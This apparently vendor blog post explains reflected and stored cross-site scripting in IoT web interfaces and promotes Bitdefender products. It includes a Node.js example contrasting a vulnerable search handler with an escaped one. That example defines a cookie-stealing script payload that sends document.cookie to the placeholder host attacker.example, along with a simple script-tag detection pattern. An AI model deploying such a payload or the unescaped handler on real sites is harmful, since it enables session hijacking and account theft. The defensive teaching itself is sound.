Understanding IoT Vulnerabilities: Code Injection Attacks Can Steal Your Web Life

Of the many methods available to attackers, they go with the simplest ones they can. They will not bother with complicated attacks on systems or web infrastructure when insufficient input checking and a little misdirection let them run malicious scripts in a victim's browser.

Cross-site scripting, or XSS, is a web vulnerability that lets an attacker smuggle script into a page served by a site the victim trusts. In the reflected form described here, the attacker crafts a link to a legitimate website that looks benign but carries the malicious script in one of its parameters. Clicking the link sends the website both the ordinary request and the script. The website builds its response from the request without sanitizing that parameter, so the response includes the attacker's script, and the browser executes it because it arrives as part of the trusted site's own page and therefore runs with that site's privileges (the stored form works the same way, except the script is saved on the site, in a comment or profile field for instance, and served to every visitor). A successful XSS attack triggers no alarm for the user and can result in hijacked web accounts, stolen web sessions, remote control of the browser, or redirection to malicious locations, but the impact is not limited to these.

As a real-world analogy for XSS, say Bob the manager tells Mark, his assistant, to bring him a document outlining employee payments for the month. Unknown to the manager, Mark created the document and added a 20% bonus for himself. Bob signs the paper without checking it and tells Mark to deliver it to the finance department. When payday comes, Mark gets his "prize" because the payment document was processed without any check for anomalies: the signature, like the browser's trust in the website, vouched for content nobody inspected.

Although web browsers have built in some anti-XSS mechanisms and some add-ons offer partial protection against this type of vulnerability, none of them is a complete defense. Ultimately, fixing XSS vulnerabilities is a job for the web developers building websites and web applications: untrusted input has to be validated on the way in and encoded for the context it lands in on the way out. Despite being known for well over a decade, XSS remains common.
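The following Node.js snippet is an added example, not code from the original post or from any Bitdefender product. It ties the two points above together: it builds the kind of "otherwise benign" link the XSS description talks about, shows a page handler that reflects a search parameter straight into HTML, and shows the developer-side fix of HTML-escaping untrusted text. The site name, the search endpoint, the attacker's host and the cookie-stealing payload are all hypothetical and constructed for illustration.

```javascript
// Added example (not part of the original post): reflected XSS in a page
// that echoes its "q" search parameter, beside the hardened version.
// All names, URLs and the payload below are hypothetical.

// Vulnerable handler: the untrusted parameter is concatenated into markup.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened handler: escape the five characters that can break out of an
// HTML text or attribute context, so the browser treats q as data only.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// The attacker's link: a normal-looking search URL whose q value carries a
// script that sends the victim's cookies to a host the attacker controls.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const maliciousLink = new URL("https://nas.example.local/search");
maliciousLink.searchParams.set("q", PAYLOAD); // URL-encodes the payload

// What the server does when the victim clicks: parse the request URL,
// decode q, and render the page with whichever handler is installed.
function responseFor(link, render) {
  const q = new URL(link).searchParams.get("q");
  return render(q);
}

// Crude response check a reviewer or scanner can apply: did a raw <script>
// tag from the request survive into the HTML the browser will parse?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

const vulnerableResponse = responseFor(maliciousLink.href, renderSearchVulnerable);
const safeResponse = responseFor(maliciousLink.href, renderSearchSafe);

console.log("link the victim clicks:", maliciousLink.href);
console.log("vulnerable response:", vulnerableResponse);
console.log("hardened response:  ", safeResponse);
console.log("script runs in vulnerable page?", containsRawScriptTag(vulnerableResponse));
console.log("script runs in hardened page?  ", containsRawScriptTag(safeResponse));
```

Note that `escapeHtml` is correct only for text and quoted attribute values; a value inserted into a JavaScript block, a URL, or a CSS property needs encoding for that context instead, which is why the fix belongs with the developer who knows where the data ends up and not with a generic filter in front of the site.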

IoT devices such as network-attached storage (NAS), routers, DVR systems, IP cameras and smart home hubs ship with web-based management interfaces, and those interfaces are where XSS flaws can hide. Because the owner cannot patch a device's embedded web interface, good security for IoT gear is often a matter of installing the latest firmware version the vendor provides.

Products like Bitdefender Home Scanner report known vulnerabilities in the devices connected to the home network; you can use that information to harden the gadget yourself or to look for a vendor patch that fixes the issues reported.

Active protection for the IoT gadgets in the house is available from Bitdefender BOX, a hardware solution that monitors the traffic on your network for malicious activity. It can recognize redirect requests to suspicious websites or to phishing locations, regardless of the connected gadget that initiates the communication.

One comment

  • By PK

    This keeps happening to us, but we've been able to stay in front of it so far.
    It would be great if there were a way to scan for XSS.
